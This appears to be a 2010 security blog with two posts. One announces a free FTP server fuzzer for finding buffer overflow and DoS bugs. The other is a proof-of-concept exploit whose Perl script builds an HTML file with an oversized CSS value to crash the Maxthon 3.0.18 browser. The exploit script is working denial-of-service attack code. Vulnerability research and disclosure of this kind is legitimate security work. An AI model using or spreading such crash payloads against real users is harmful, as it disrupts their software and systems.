Monday, November 8, 2010

4n FTP Fuzzer v1.00


4n FTP Fuzzer Is Free Program, For find vulnerability in ftp server programs.
4n FTP Fuzzer v1.00 Is Desingned to find Buffer Overflow and DoS vulnerabilities.

Key Features of this fuzzer:

-Supports up to 30 FTP commands 
-High speed fuzzing
-Shows message when vulnerability happens
-Live fuzzing status and server response
-Live log
-Changeable username,password,ip and port fields
-Maximum and minimum fields
-Start/Stop buttons to control fuzzing process 

Project Sourceforge address:

https://sourceforge.net/projects/project4n

Tuesday, November 2, 2010

Maxthon 3.0.18.1000 CSS Denial of Service Vulnerability

#
#########################################################################################
# #
# Title: Maxthon 3.0.18.1000 CSS Denial of Service Vulnerability #
# Author: 4n0nym0us (Arash Sa'adatfar) #
# Developer: Maxthon International #
# Version:3.0.18 #
# Software Link: http://dl.maxthon.com/mx3/mx3.0.18.1000.exe #
# #
# Tested On: Windows 7 Ultimate 32-bit #
# #
#########################################################################################
#

#!/usr/bin/perl
my $file= "Crash.html";
my $junk= "A/" x 10000000;
open($FILE,">$file");
print $FILE "<html>\n<head>\n<style type='text/css'>\nbody {alink: ".$junk."}\n</style>\n</head>\n</html>";
print "\nCrash.html File Created successfully\n";
close($FILE);


http://www.exploit-db.com/exploits/15394/